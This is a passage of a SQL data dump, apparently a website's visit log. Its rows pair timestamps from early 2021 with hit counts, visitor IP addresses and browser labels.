894,1,0,1,0,'66.249.70.43',''),(552050,1613966571,1,0,1,0,'66.249.70.45',''),(552051,1613967341,1,1,0,0,'173.252.127.22','other'),(552052,1613972046,1,1,0,0,'173.252.127.10','chrome'),(552053,1613972067,1,1,0,0,'173.252.127.118','chrome'),(552054,1613972068,1,1,0,0,'173.252.127.25','chrome'),(552055,1613977624,1,1,0,0,'91.207.60.34','firefox'),(552056,1613977625,1,1,0,0,'91.207.60.34','chrome'),(552057,1613989713,1,1,0,0,'23.228.109.147','chrome'),(552058,1613989855,1,1,0,0,'66.249.70.43','chrome'),(552059,1613991680,1,0,1,0,'66.249.70.43',''),(552060,1613998251,1,1,0,0,'66.249.70.45','chrome'),(552061,1614003317,1,1,0,0,'66.249.70.45','chrome'),(552062,1614003684,1,1,0,0,'74.125.151.47','other'),(552063,1614013644,1,1,0,0,'66.220.149.9','other'),(552064,1614017279,1,0,1,0,'66.249.70.47',''),(552065,1614026600,1,1,0,0,'195.10.210.70','chrome'),(552066,1614047187,1,0,1,0,'66.249.70.45',''),(552067,1614048420,1,0,1,0,'66.249.70.43',''),(552068,1614048973,1,1,0,0,'66.249.70.47','chrome'),(552069,1614052638,1,0,1,0,'66.249.70.43',''),(552070,1614053248,1,1,0,0,'66.249.70.45','chrome'),(552071,1614056553,1,0,1,0,'66.249.70.45',''),(552072,1614077652,1,1,0,0,'31.13.127.26','other'),(552073,1614077660,1,1,0,0,'31.13.127.117','other'),(552074,1614077662,1,1,0,0,'69.171.251.116','other'),(552075,1614083847,1,1,0,0,'31.13.127.4','other'),(552077,1614083858,1,1,0,0,'66.249.70.43','chrome'),(552078,1614096518,1,1,0,0,'185.237.217.11','chrome'),(552079,1614104420,1,1,0,0,'173.252.127.27','other'),(552080,1614104514,1,1,0,0,'31.13.127.11','other'),(552081,1614143521,1,0,1,0,'66.249.70.45',''),(552082,1614146960,1,1,0,0,'66.249.70.45','chrome'),(552083,1614148825,1,1,0,0,'173.252.127.10','other'),(552084,1614152143,1,0,1,0,'66.249.70.45',''),(552085,1614153454,1,1,0,0,'66.249.70.45','chrome'),(552086,1614155949,1,1,0,0,'173.252.127.22','other'),(552087,1614156456,1,1,0,0,'66.220.149.111','other'),(552088,1614156488,1,1,0,0,'31.13.127.23','other'),(552089,1614156490,1,1,0,0,'31.13.127.7','other'),(552090,1614158564,1,1,0,0,'173.252.127.28','other'),(552091,1614168184,1,1,0,0,'173.252.127.119','other'),(552092,1614169564,2,2,0,0,'69.171.251.26','other'),(552093,1614169611,1,1,0,0,'69.171.251.112','other'),(552094,1614169662,2,2,0,0,'69.171.251.21','other'),(552095,1614169665,1,1,0,0,'173.252.127.8','other'),(552096,1614169715,1,1,0,0,'69.171.251.117','other'),(552097,1614169717,1,1,0,0,'69.171.251.5','other'),(552098,1614169723,1,1,0,0,'69.171.251.24','other'),(552099,1614169734,2,2,0,0,'69.171.251.27','other'),(552101,1614169745,1,1,0,0,'69.171.251.23','other'),(552102,1614169746,1,1,0,0,'69.171.251.22','other'),(552103,1614169747,1,1,0,0,'69.171.251.7','other'),(552104,1614177130,1,1,0,0,'66.249.70.43','chrome'),(552105,1614182602,4,4,0,0,'18.194.196.202','chrome'),(552106,1614182633,1,1,0,0,'173.252.127.38','other'),(552107,1614184826,1,1,0,0,'66.249.70.45','chrome'),(552108,1614190720,1,1,0,0,'173.252.127.16','other'),(552109,1614190834,1,1,0,0,'173.252.127.20','other'),(552110,1614191623,1,1,0,0,'31.13.127.6','other'),(552111,1614191625,1,1,0,0,'173.252.127.119','other'),(552112,1614191645,2,2,0,0,'31.13.127.24','other'),(552113,1614191646,1,1,0,0,'31.13.127.5','other'),(552114,1614210082,1,1,0,0,'31.13.127.13','other'),(552115,1614210084,1,1,0,0,'69.171.251.5','other'),(552116,1614217284,1,0,1,0,'66.249.70.43',''),(552117,1614225092,1,0,1,0,'66.249.70.47',''),(552118,1614229709,1,1,0,0,'69.171.251.11','other'),(552119,1614230705,2,0,2,0,'66.249.70.45',''),(552120,1614232304,1,1,0,0,'69.171.251.3','other'),(552121,1614238534,1,0,1,0,'66.249.70.43',''),(552122,1614238628,1,1,0,0,'173.252.127.33','other'),(552123,1614239365,1,1,0,0,'69.171.251.24','other'),(552124,1614242508,1,1,0,0,'66.220.149.30','other'),(552125,1614258837,1,1,0,0,'31.13.127.14','other'),(552126,1614258839,1,1,0,0,'173.252.127.18','other'),(552127,1614259416,1,1,0,0,'31.13.127.3','other'),(552128,1614259417,1,1,0,0,'69.171.251.11','other'),(552129,1614262822,1,1,0,0,'173.252.127.27','other'),(552130,1614276091,1,1,0,0,'173.252.127.34','other'),(552131,1614277270,1,1,0,0,'31.13.127.29','other'),(552132,1614277589,1,1,0,0,'91.196.178.88','chrome'),(552133,1614293068,1,1,0,0,'44.234.147.77','chrome'),(552134,1614307890,1,0,1,0,'66.249.70.43',''),(552135,1614324258,1,1,0,0,'84.17.49.183','chrome'),(552136,1614324451,1,0,1,0,'66.249.70.43',''),(552137,1614325245,1,1,0,0,'173.252.127.31','other'),(552138,1614325360,1,1,0,0,'66.220.149.16','other'),(552139,1614326294,1,1,0,0,'66.220.149.39','other'),(552140,1614328245,1,1,0,0,'66.249.70.45','chrome'),(552141,1614328390,1,1,0,0,'66.249.70.43','chrome'),(552142,1614347432,1,1,0,0,'67.205.40.201','firefox'),(552143,1614355899,1,0,1,0,'66.249.70.47',''),(552144,1614358096,1,1,0,0,'91.196.178.90','chrome'),(552145,1614358286,1,1,0,0,'173.252.127.34','other'),(552146,1614359964,1,1,0,0,'66.249.70.43','chrome'),(552147,1614367043,1,0,1,0,'66.249.70.43',''),(552148,1614377408,1,1,0,0,'116.203.182.168','firefox'),(552149,1614387894,1,0,1,0,'66.249.70.43',''),(552150,1614392559,1,1,0,0,'51.77.247.43','firefox'),(552151,1614410001,1,0,1,0,'66.249.70.45',''),(552152,1614412870,1,0,1,0,'66.249.70.47',''),(552153,1614412913,2,2,0,0,'23.228.109.147','chrome'),(552154,1614414886,1,1,0,0,'23.228.109.147','chrome'),(552155,1614419961,1,0,1,0,'66.249.70.43',''),(552156,1614427096,1,1,0,0,'51.158.103.247','other'),(552157,1614432218,8,8,0,0,'54.149.177.207','chrome'),(552158,1614451914,1,1,0,0,'69.171.251.3','other'),(552159,1614454595,1,1,0,0,'51.15.205.3','other'),(552160,1614457613,1,1,0,0,'173.252.95.16','other'),(552161,1614459067,4,4,0,0,'109.70.111.112','chrome'),(552162,1614461571,1,1,0,0,'173.252.111.17','other'),(552163,1614462379,1,1,0,0,'54.203.73.198','chrome'),(552164,1614465976,1,1,0,0,'54.203.73.198','chrome'),(552165,1614471154,2,2,0,0,'23.228.109.147','chrome'),(552166,1614476839,1,0,1,0,'66.249.70.43',''),(552167,1614493177,1,1,0,0,'31.13.103.2','other'),(552168,1614495516,1,0,1,0,'66.249.70.47',''),(552169,1614507147,8,8,0,0,'34.217.116.93','chrome'),(552170,1614507585,1,0,1,0,'66.249.70.45',''),(552171,1614518763,1,1,0,0,'45.146.167.63','other'),(552172,1614519118,1,1,0,0,'23.228.109.147','chrome'),(552173,1614525809,1,1,0,0,'88.155.75.165','chrome'),(552174,1614526650,1,0,1,0,'66.249.70.45',''),(552175,1614533401,1,1,0,0,'185.237.217.11','chrome'),(552176,1614540971,1,1,0,0,'173.252.127.24','other'),(552177,1614557926,1,1,0,0,'66.249.70.43','chrome'),(552178,1614558721,1,1,0,0,'66.249.70.45','chrome'),(552179,1614559277,1,0,1,0,'66.249.70.47',''),(552180,1614561506,1,1,0,0,'66.249.70.47','chrome'),(552181,1614574331,1,1,0,0,'66.249.70.43','chrome'),(552182,1614581071,1,0,1,0,'66.249.70.45',''),(552183,1614595997,1,1,0,0,'66.249.70.43','chrome'),(552184,1614599504,4,4,0,0,'18.221.206.247','chrome'),(552185,1614603546,1,0,1,0,'66.249.70.45',''),(552186,1614621027,1,1,0,0,'185.237.217.11','chrome'),(552187,1614621104,10,10,0,0,'159.89.25.241','chrome'),(552188,1614621109,295,295,0,0,'188.166.77.81','chrome'),(552189,1614621113,303,303,0,0,'178.62.240.30','chrome'),(552191,1614621114,18,18,0,0,'139.59.137.173','chrome'),(552192,1614621175,6,6,0,0,'167.71.45.254','chrome'),(552193,1614621441,2,2,0,0,'185.237.74.141','chrome'),(552194,1614638717,1,1,0,0,'66.249.70.43','chrome'),(552195,1614643317,1,1,0,0,'109.70.106.130','other'),(552196,1614648396,1,0,1,0,'66.249.70.45',''),(552197,1614650433,1,0,1,0,'66.249.70.43',''),(552198,1614666658,1,0,1,0,'66.249.70.45',''),(552199,1614679845,2,1,1,0,'66.249.70.43',''),(552200,1614680063,1,1,0,0,'66.249.70.47','chrome'),(552201,1614680150,1,1,0,0,'66.249.70.45','chrome'),(552202,1614682332,1,1,0,0,'66.249.70.43','chrome'),(552203,1614699510,1,1,0,0,'173.252.127.16','other'),(552204,1614700780,4,4,0,0,'52.64.20.252','chrome'),(552205,1614730420,1,0,1,0,'66.249.70.45',''),(552206,1614732378,1,1,0,0,'178.133.132.228','chrome'),(552207,1614733497,1,1,0,0,'54.244.61.216','firefox'),(552208,1614735514,1,1,0,0,'66.220.149.118','other'),(552209,1614752215,1,0,1,0,'66.249.70.45',''),(552210,1614758091,1,1,0,0,'173.252.127.117','other'),(552211,1614758667,1,0,1,0,'66.249.70.47',''),(552212,1614762075,1,1,0,0,'31.13.127.12','other'),(552213,1614772560,1,1,0,0,'173.252.127.26','other'),(552214,1614784196,1,1,0,0,'164.132.38.166','firefox'),(552215,1614816455,1,0,1,0,'66.249.70.45',''),(552216,1614838131,1,0,1,0,'66.249.70.43',''),(552217,1614852531,1,0,1,0,'66.249.70.45',''),(552218,1614857918,1,0,1,0,'66.249.70.47',''),(552219,1614872084,4,4,0,0,'34.237.4.205','chrome'),(552220,1614880537,1,1,0,0,'157.245.240.102','firefox'),(552221,1614888074,1,1,0,0,'31.13.127.32','other'),(552222,1614888269,1,1,0,0,'31.13.127.111','other'),(552223,1614911936,1,0,1,0,'66.249.70.43',''),(552224,1614923794,1,0,1,0,'66.249.70.47',''),(552225,1614924194,1,1,0,0,'194.93.6.171','opera'),(552226,1614931951,1,1,0,0,'159.89.33.32','other'),(552227,1614931969,1,1,0,0,'161.35.136.156','other'),(552228,1614939651,4,4,0,0,'3.0.115.255','chrome'),(552229,1614961089,3,3,0,0,'107.180.103.185','firefox'),(552230,1614961568,1,1,0,0,'18.200.4.27','other'),(552231,1614962310,2,2,0,0,'185.237.217.11','chrome'),(552232,1614962690,1,1,0,0,'69.171.251.9','other'),(552233,1614962826,1,1,0,0,'31.13.127.118','other'),(552234,1614962845,2,2,0,0,'31.13.127.22','other'),(552235,1614962869,1,1,0,0,'31.13.127.18','other'),(552236,1614962870,1,1,0,0,'31.13.127.6','other'),(552237,1614962872,1,1,0,0,'69.171.251.14','other'),(552239,1614962902,2,2,0,0,'31.13.127.25','other'),(552240,1614962903,1,1,0,0,'31.13.127.29','other'),(552241,1614963362,1,1,0,0,'185.237.217.11','chrome'),(552242,1614963490,1,1,0,0,'31.13.127.36','other'),(552243,1614964195,3,3,0,0,'31.13.127.25','other'),(552244,1614964196,1,1,0,0,'173.252.87.21','other'),(552245,1614964197,1,1,0,0,'173.252.87.14','other'),(552246,1614964199,1,1,0,0,'173.252.87.119','other'),(552247,1614964311,1,1,0,0,'185.237.217.11','chrome'),(552248,1614964715,2,2,0,0,'31.13.127.8','other'),(552249,1614964725,2,2,0,0,'31.13.127.20','other'),(552250,1614964952,1,1,0,0,'31.13.127.4','other'),(552253,1614964953,1,1,0,0,'31.13.127.24','other'),(552255,1614964954,2,2,0,0,'31.13.127.117','other'),(552257,1614964956,2,2,0,0,'31.13.127.28','other'),(552258,1614964969,1,1,0,0,'31.13.115.9','other'),(552260,1614966057,3,3,0,0,'104.248.113.51','firefox'),(552261,1614966852,2,2,0,0,'185.237.217.11','chrome'),(552262,1614966859,1,1,0,0,'194.44.36.117','chrome'),(552263,1614967580,4,4,0,0,'78.154.174.50','chrome'),(552264,1614967909,1,1,0,0,'185.237.217.11','chrome'),(552265,1614968660,1,1,0,0,'173.252.127.29','other'),(552266,1614968835,1,1,0,0,'85.48.186.122','chrome'),(552267,1614968974,1,1,0,0,'185.237.217.11','chrome'),(552268,1614970769,1,1,0,0,'185.237.217.11','chrome'),(552269,1614971082,1,1,0,0,'146.120.168.154','chrome'),(552270,1614971441,1,1,0,0,'173.252.79.17','other'),(552271,1614971442,2,2,0,0,'173.252.79.23','other'),(552272,1614971689,1,1,0,0,'94.153.87.130','chrome'),(552273,1614972203,1,1,0,0,'5.58.94.182','chrome'),(552274,1614973032,1,1,0,0,'185.237.217.11','chrome'),(552275,1614976602,1,1,0,0,'185.237.217.11','chrome'),(552276,1614980894,1,1,0,0,'217.196.161.174','chrome'),(552277,1614981265,1,1,0,0,'46.19.86.4','chrome'),(552278,1614985222,1,1,0,0,'69.171.251.14','other'),(552279,1614985311,1,1,0,0,'69.171.251.23','other'),(552280,1614985312,1,1,0,0,'69.171.251.118','other'),(552281,1614999523,1,1,0,0,'185.237.217.11','chrome'),(552282,1615000156,1,0,1,0,'66.249.70.45',''),(552283,1615000889,1,1,0,0,'66.249.70.45','chrome'),(552284,1615007935,1,1,0,0,'173.252.111.24','other'),(552285,1615007936,1,1,0,0,'173.252.111.10','other'),(552286,1615007976,1,1,0,0,'173.252.95.5','other'),(552287,1615008163,4,4,0,0,'34.241.77.13','chrome'),(552288,1615010117,1,0,1,0,'66.249.70.47',''),(552289,1615010202,1,1,0,0,'95.47.250.12','chrome'),(552290,1615011354,1,1,0,0,'31.13.127.14','other'),(552291,1615013009,1,1,0,0,'176.108.106.4','chrome'),(552292,1615016064,1,1,0,0,'173.252.127.117','other'),(552293,1615020805,1,1,0,0,'185.237.217.11','chrome'),(552294,1615028168,1,1,0,0,'194.44.105.252','chrome'),(552295,1615029528,1,1,0,0,'173.252.111.11','other'),(552296,1615033175,1,1,0,0,'5.58.18.203','chrome'),(552297,1615036670,1,1,0,0,'37.134.225.155','chrome'),(552298,1615038299,1,1,0,0,'31.13.115.7','other'),(552299,1615038300,2,2,0,0,'31.13.115.4','other'),(552302,1615038356,1,1,0,0,'31.13.115.10','other'),(552303,1615038363,1,1,0,0,'66.220.149.31','other'),(552304,1615038382,1,1,0,0,'173.252.127.3','other'),(552305,1615042205,1,1,0,0,'185.237.217.11','chrome'),(552306,1615043665,1,1,0,0,'195.114.121.174','chrome'),(552307,1615043824,1,1,0,0,'46.211.51.20','chrome'),(552308,1615052472,1,1,0,0,'91.196.178.72','chrome'),(552309,1615056091,1,1,0,0,'91.220.61.254','chrome'),(552310,1615058240,2,2,0,0,'31.13.127.3','other'),(552311,1615058683,1,1,0,0,'94.153.92.7','chrome'),(552312,1615061550,1,1,0,0,'66.249.70.45','chrome'),(552313,1615064807,1,1,0,0,'31.148.135.17','chrome'),(552314,1615066733,1,1,0,0,'173.252.83.9','other'),(552315,1615066734,1,1,0,0,'173.252.83.19','other'),(552316,1615071660,1,1,0,0,'175.44.42.200','other'),(552317,1615072377,1,1,0,0,'66.220.149.112','other'),(552318,1615072382,1,1,0,0,'31.13.127.17','other'),(552319,1615093498,1,1,0,0,'185.237.217.11','chrome'),(552320,1615095695,1,0,1,0,'66.249.70.47',''),(552322,1615096740,1,0,1,0,'66.249.70.45',''),(552323,1615097557,1,1,0,0,'185.237.217.11','chrome'),(552324,1615105681,1,1,0,0,'176.108.124.170','chrome'),(552325,1615105943,1,1,0,0,'173.252.127.15','other'),(552326,1615106576,1,1,0,0,'69.171.251.11','other'),(552327,1615106639,1,1,0,0,'69.171.251.117','other'),(552328,1615106656,1,1,0,0,'31.13.127.117','other'),(552329,1615106657,1,1,0,0,'31.13.127.26','other'),(552331,1615111137,1,1,0,0,'5.58.254.209','chrome'),(552332,1615111210,1,1,0,0,'5.58.163.248','chrome'),(552333,1615114396,2,2,0,0,'173.252.79.9','other'),(552334,1615114397,1,1,0,0,'173.252.79.23','other'),(552335,1615125107,2,2,0,0,'178.133.22.54','chrome'),(552336,1615130983,1,1,0,0,'94.153.72.96','chrome'),(552337,1615131941,1,0,1,0,'66.249.70.47',''),(552338,1615135312,1,1,0,0,'173.252.127.20','other'),(552339,1615136026,1,1,0,0,'31.13.127.10','other'),(552340,1615136027,1,1,0,0,'31.13.127.9','other'),(552341,1615143053,1,1,0,0,'66.249.70.43','chrome'),(552342,1615152882,1,1,0,0,'173.252.127.22','other'),(552343,1615153161,3,3,0,0,'31.13.127.112','other'),(552344,1615153163,1,1,0,0,'173.252.127.4','other'),(552345,1615153165,1,1,0,0,'69.171.251.119','other'),(552346,1615153166,1,1,0,0,'31.13.127.23','other'),(552347,1615153167,1,1,0,0,'31.13.127.9','other'),(552349,1615153319,1,1,0,0,'31.13.127.27','other'),(552350,1615153320,1,1,0,0,'31.13.127.29','other'),(552351,1615153322,1,1,0,0,'31.13.127.21','other'),(552352,1615153323,1,1,0,0,'31.13.127.113','other'),(552353,1615153328,1,1,0,0,'31.13.127.116','other'),(552354,1615172573,1,0,1,0,'66.249.70.47',''),(552355,1615172855,1,0,1,0,'66.249.70.45',''),(552356,1615173849,1,0,1,0,'66.249.70.43',''),(552357,1615181205,1,0,1,0,'66.249.70.45',''),(552358,1615188387,1,1,0,0,'31.13.127.21','other'),(552359,1615191956,1,1,0,0,'23.228.109.147','chrome'),(552360,1615195196,1,1,0,0,'173.252.127.3','other'),(552361,1615210638,1,1,0,0,'66.220.149.18','other'),(552362,1615216167,1,1,0,0,'31.13.127.24','other'),(552363,1615220782,1,1,0,0,'66.249.70.43','chrome'),(552364,1615223987,1,1,0,0,'31.13.127.117','other'),(552365,1615223989,1,1,0,0,'173.252.127.31','other'),(552366,1615224017,1,1,0,0,'95.46.104.165','chrome'),(552367,1615225529,3,3,0,0,'208.109.53.185','firefox'),(552368,1615227437,1,1,0,0,'46.183.218.235','chrome'),(552369,1615227657,1,1,0,0,'69.171.251.31','other'),(552370,1615231170,2,2,0,0,'89.185.227.164','firefox'),(552372,1615231656,1,1,0,0,'176.108.120.25','chrome'),(552373,1615231943,1,1,0,0,'69.171.251.30','other'),(552374,1615236664,1,1,0,0,'8.210.116.224','firefox'),(552375,1615241452,1,1,0,0,'69.171.251.5','other'),(552376,1615244124,1,1,0,0,'69.171.251.118','other'),(552377,1615244148,1,1,0,0,'173.252.127.17','other'),(552378,1615254198,1,0,1,0,'66.249.70.45',''),(552379,1615260891,1,1,0,0,'66.249.70.43','chrome'),(552380,1615265121,1,1,0,0,'66.249.70.47','chrome'),(552381,1615266968,1,0,1,0,'66.249.70.47',''),(552382,1615267236,1,1,0,0,'66.249.70.43','chrome'),(552383,1615268020,1,1,0,0,'46.211.67.28','chrome'),(552384,1615268944,1,1,0,0,'66.249.70.47','chrome'),(552385,1615269234,2,0,2,0,'66.249.70.43',''),(552386,1615277180,1,0,1,0,'66.249.70.45',''),(552387,1615277704,1,1,0,0,'66.249.70.45','chrome'),(552388,1615282975,1,1,0,0,'31.13.127.26','other'),(552389,1615282977,1,1,0,0,'69.171.251.20','other'),(552390,1615286344,1,1,0,0,'66.249.70.13','chrome'),(552391,1615287146,1,1,0,0,'69.171.251.20','other'),(552392,1615288316,1,1,0,0,'66.249.70.11','chrome'),(552393,1615291281,1,1,0,0,'178.133.229.247','chrome'),(552394,1615291522,1,1,0,0,'66.249.70.15','chrome'),(552395,1615293652,1,1,0,0,'66.249.70.13','chrome'),(552396,1615295116,1,1,0,0,'173.252.95.116','other'),(552397,1615296728,1,1,0,0,'66.249.70.13','chrome'),(552398,1615298967,1,1,0,0,'66.249.70.11','chrome'),(552399,1615300402,1,0,1,0,'66.249.70.13',''),(552400,1615302795,1,1,0,0,'66.249.70.11','chrome'),(552401,1615314742,1,0,1,0,'66.249.70.13',''),(552402,1615320731,1,1,0,0,'66.249.70.11','chrome'),(552403,1615325071,1,1,0,0,'66.249.70.15','chrome'),(552404,1615327199,1,1,0,0,'31.13.127.32','other'),(552405,1615335199,1,1,0,0,'185.222.57.184','other'),(552406,1615345902,1,1,0,0,'66.249.70.13','chrome'),(552407,1615351012,1,0,1,0,'66.249.70.13',''),(552408,1615352663,1,0,1,0,'66.249.70.13',''),(552409,1615356788,1,0,1,0,'66.249.70.11',''),(552410,1615376947,1,1,0,0,'31.13.127.21','other'),(552411,1615377831,1,1,0,0,'69.171.251.23','other'),(552412,1615378716,1,1,0,0,'66.249.70.15','chrome'),(552413,1615379745,1,1,0,0,'66.249.70.13','chrome'),(552414,1615389691,1,1,0,0,'173.252.127.34','other'),(552415,1615395349,1,1,0,0,'66.249.70.15','chrome'),(552416,1615402033,1,1,0,0,'66.249.70.13','chrome'),(552417,1615407432,1,0,1,0,'66.249.70.13',''),(552418,1615409145,1,1,0,0,'66.249.70.13','chrome'),(552419,1615414661,1,1,0,0,'66.249.70.11','chrome'),(552420,1615424090,1,1,0,0,'66.249.70.13','chrome'),(552421,1615426515,45,45,0,0,'185.222.57.184','firefox'),(552422,1615426522,3,3,0,0,'185.222.57.184','other'),(552423,1615426749,1,1,0,0,'66.249.70.11','chrome'),(552424,1615433921,1,1,0,0,'31.13.115.20','other'),(552425,1615438602,1,0,1,0,'66.249.70.13',''),(552426,1615439299,1,1,0,0,'66.249.70.15','chrome'),(552427,1615439309,1,1,0,0,'66.249.70.13','chrome'),(552428,1615440519,1,1,0,0,'66.249.70.15','chrome'),(552429,1615442420,1,1,0,0,'37.73.67.128','chrome'),(552430,1615444917,1,0,1,0,'66.249.70.15',''),(552431,1615445248,1,1,0,0,'66.249.70.15','chrome'),(552432,1615445958,1,1,0,0,'66.249.70.13','chrome'),(552433,1615445969,2,2,0,0,'66.249.70.11','chrome'),(552434,1615447111,1,1,0,0,'31.13.127.19','other'),(552435,1615447635,1,0,1,0,'66.249.70.15',''),(552436,1615448316,1,1,0,0,'66.249.70.11','chrome'),(552437,1615448685,3,3,0,0,'66.249.70.15','chrome'),(552438,1615452780,2,2,0,0,'66.249.70.15','chrome'),(552439,1615455467,1,1,0,0,'31.13.127.20','other'),(552440,1615456833,1,1,0,0,'66.249.73.39','chrome'),(552441,1615458860,1,1,0,0,'150.136.140.254','chrome'),(552442,1615460138,2,2,0,0,'66.249.70.13','chrome'),(552443,1615460431,1,1,0,0,'66.249.70.11','chrome'),(552444,1615462128,1,0,1,0,'66.249.70.15',''),(552445,1615462681,1,1,0,0,'66.249.70.15','chrome'),(552446,1615463719,4,4,0,0,'157.230.245.249','other'),(552447,1615466163,1,1,0,0,'173.252.127.117','other'),(552448,1615468007,1,0,1,0,'66.249.70.15',''),(552449,1615470373,1,1,0,0,'69.171.251.8','other'),(552450,1615471113,1,1,0,0,'66.249.70.11','chrome'),(552451,1615472984,1,0,1,0,'66.249.70.13',''),(552452,1615478669,1,1,0,0,'66.249.70.15','chrome'),(552453,1615484211,1,1,0,0,'64.246.165.160','firefox'),(552454,1615497955,1,1,0,0,'66.249.70.13','chrome'),(552455,1615497970,1,1,0,0,'66.249.70.11','chrome'),(552456,1615501351,1,0,1,0,'66.249.70.15',''),(552457,1615503649,2,2,0,0,'66.249.70.11','chrome'),(552458,1615505751,1,1,0,0,'66.249.70.15','chrome'),(552459,1615507303,1,1,0,0,'66.249.70.13','chrome'),(552460,1615510097,1,1,0,0,'66.249.70.11','chrome'),(552461,1615517253,1,1,0,0,'66.249.70.15','chrome'),(552462,1615517552,2,2,0,0,'66.249.70.11','chrome'),(552463,1615521786,1,1,0,0,'66.249.70.13','chrome'),(552464,1615524658,1,0,1,0,'66.249.70.15',''),(552465,1615526167,1,1,0,0,'66.249.70.13','chrome'),(552466,1615540977,1,0,1,0,'66.249.70.11',''),(552467,1615555371,1,0,1,0,'66.249.70.15',''),(552468,1615562879,1,1,0,0,'66.249.70.13','chrome'),(552469,1615562978,1,1,0,0,'66.249.70.15','chrome'),(552470,1615563217,1,1,0,0,'178.133.61.170','chrome'),(552471,1615576419,1,0,1,0,'66.249.70.15',''),(552472,1615588761,1,1,0,0,'66.249.70.11','chrome'),(552473,1615590519,1,1,0,0,'66.249.70.13','chrome'),(552474,1615590559,1,0,1,0,'66.249.70.15',''),(552475,1615599442,1,1,0,0,'66.249.70.11','chrome'),(552476,1615605125,1,1,0,0,'20.84.113.215','chrome'),(552477,1615607450,1,0,1,0,'66.249.70.11',''),(552478,1615610397,1,0,1,0,'66.249.70.13',''),(552479,1615610398,1,0,1,0,'66.249.70.11',''),(552480,1615613777,1,1,0,0,'150.136.140.254','chrome'),(552481,1615616291,2,2,0,0,'3.8.68.2','chrome'),(552482,1615626286,1,0,1,0,'66.249.70.15',''),(552483,1615643722,1,0,1,0,'66.249.70.15',''),(552484,1615668806,1,1,0,0,'23.228.109.147','chrome'),(552485,1615669861,4,4,0,0,'157.230.245.249','other'),(552486,1615696078,1,0,1,0,'66.249.70.11',''),(552487,1615704116,1,1,0,0,'173.252.127.1','other'),(552488,1615704630,2,2,0,0,'185.237.217.11','chrome'),(552489,1615705557,1,1,0,0,'185.237.217.11','chrome'),(552490,1615707542,1,0,1,0,'66.249.70.13',''),(552491,1615707737,1,1,0,0,'185.237.217.11','chrome'),(552492,1615710830,1,1,0,0,'66.249.70.13','chrome'),(552493,1615713186,1,1,0,0,'66.249.70.11','chrome'),(552494,1615715587,2,1,1,0,'66.249.70.15',''),(552495,1615715781,1,1,0,0,'185.237.217.11','chrome'),(552496,1615718463,1,1,0,0,'66.249.70.13','chrome'),(552497,1615719638,1,1,0,0,'69.171.251.28','other'),(552498,1615720411,1,1,0,0,'66.249.70.15','chrome'),(552499,1615723332,1,1,0,0,'69.171.251.22','other'),(552500,1615747790,1,1,0,0,'66.249.70.15','chrome'),(552501,1615766042,1,1,0,0,'66.249.70.11','chrome'),(552502,1615775947,1,0,1,0,'66.249.70.13',''),(552503,1615782848,1,0,1,0,'66.249.70.13',''),(552504,1615790235,1,0,1,0,'66.249.70.15',''),(552505,1615794792,2,2,0,0,'66.249.93.56','chrome'),(552506,1615828716,1,1,0,0,'31.13.127.31','other'),(552507,1615836419,1,1,0,0,'66.220.149.6','other'),(552508,1615836763,1,1,0,0,'66.249.70.11','chrome'),(552509,1615836765,1,1,0,0,'66.249.70.13','chrome'),(552510,1615844979,1,1,0,0,'91.196.178.111','chrome'),(552511,1615864401,1,0,1,0,'66.249.70.15',''),(552512,1615868788,1,0,1,0,'66.249.70.13',''),(552513,1615880534,1,1,0,0,'69.171.251.21','other'),(552514,1615896115,1,0,1,0,'66.249.70.13',''),(552515,1615897538,1,0,1,0,'66.249.70.13',''),(552516,1615898296,1,1,0,0,'31.13.103.119','other'),(552517,1615902671,1,1,0,0,'66.249.70.13','chrome'),(552518,1615905678,1,0,1,0,'66.249.70.15',''),(552519,1615905797,1,0,1,0,'66.249.70.13',''),(552520,1615913302,1,1,0,0,'185.237.217.11','chrome'),(552521,1615916609,3,3,0,0,'192.99.31.122','firefox'),(552522,1615927045,1,1,0,0,'173.252.111.21','other'),(552523,1615927096,3,3,0,0,'173.249.35.108','firefox'),(552524,1615934787,1,1,0,0,'23.228.109.147','chrome'),(552525,1615937728,3,3,0,0,'3.141.168.197','chrome'),(552526,1615943772,1,0,1,0,'66.249.70.15',''),(552527,1615950402,1,0,1,0,'66.249.70.13',''),(552528,1615953494,1,0,1,0,'66.249.70.11',''),(552529,1615959251,1,0,1,0,'66.249.70.11',''),(552530,1615974919,1,1,0,0,'66.249.70.11','chrome'),(552531,1615998002,1,1,0,0,'31.13.127.11','other'),(552532,1615998003,1,1,0,0,'31.13.127.18','other'),(552533,1615998006,1,1,0,0,'173.252.127.11','other'),(552534,1616003685,3,3,0,0,'164.132.74.35','firefox'),(552535,1616006488,3,3,0,0,'185.104.44.105','firefox'),(552536,1616011063,1,1,0,0,'173.252.127.11','other'),(552537,1616011137,1,1,0,0,'173.252.111.119','other'),(552538,1616014896,1,1,0,0,'173.252.95.16','other'),(552539,1616034847,1,1,0,0,'66.249.70.47','chrome'),(552540,1616040708,1,0,1,0,'66.249.70.43',''),(552541,1616061136,4,4,0,0,'23.228.109.147','chrome'),(552542,1616064237,1,1,0,0,'66.249.70.43','chrome'),(552543,1616064585,1,1,0,0,'31.13.127.4','other'),(552544,1616064586,1,1,0,0,'31.13.127.8','other'),(552545,1616073458,1,1,0,0,'93.170.136.166','chrome'),(552546,1616091900,5,5,0,0,'159.65.4.35','other'),(552547,1616109015,1,1,0,0,'66.249.70.43','chrome'),(552548,1616112158,1,0,1,0,'66.249.70.45',''),(552549,1616121601,1,0,1,0,'66.249.66.93',''),(552550,1616124599,1,1,0,0,'51.178.17.214','firefox'),(552551,1616128677,1,0,1,0,'66.249.66.91',''),(552552,1616135417,1,0,1,0,'66.249.66.92',''),(552553,1616174275,5,5,0,0,'23.228.109.147','chrome'),(552554,1616179454,1,1,0,0,'66.220.149.120','other'),(552555,1616181469,1,1,0,0,'66.220.149.21','other'),(552556,1616191302,1,1,0,0,'173.252.127.30','other'),(552557,1616191312,1,1,0,0,'31.13.127.29','other'),(552558,1616194674,1,1,0,0,'66.249.66.92','chrome'),(552559,1616217416,1,0,1,0,'66.249.66.91',''),(552560,1616218165,1,1,0,0,'173.252.127.10','other'),(552561,1616219116,1,0,1,0,'66.249.66.93',''),(552562,1616223641,1,0,1,0,'66.249.66.93',''),(552563,1616232376,1,1,0,0,'23.228.109.147','chrome'),(552564,1616244521,1,1,0,0,'66.249.66.91','chrome'),(552565,1616250572,1,1,0,0,'91.225.38.77','chrome'),(552566,1616252997,1,1,0,0,'172.104.173.217','chrome'),(552567,1616259227,2,2,0,0,'37.73.72.79','other'),(552568,1616267202,1,1,0,0,'173.252.111.20','other'),(552569,1616267204,1,1,0,0,'173.252.127.29','other'),(552570,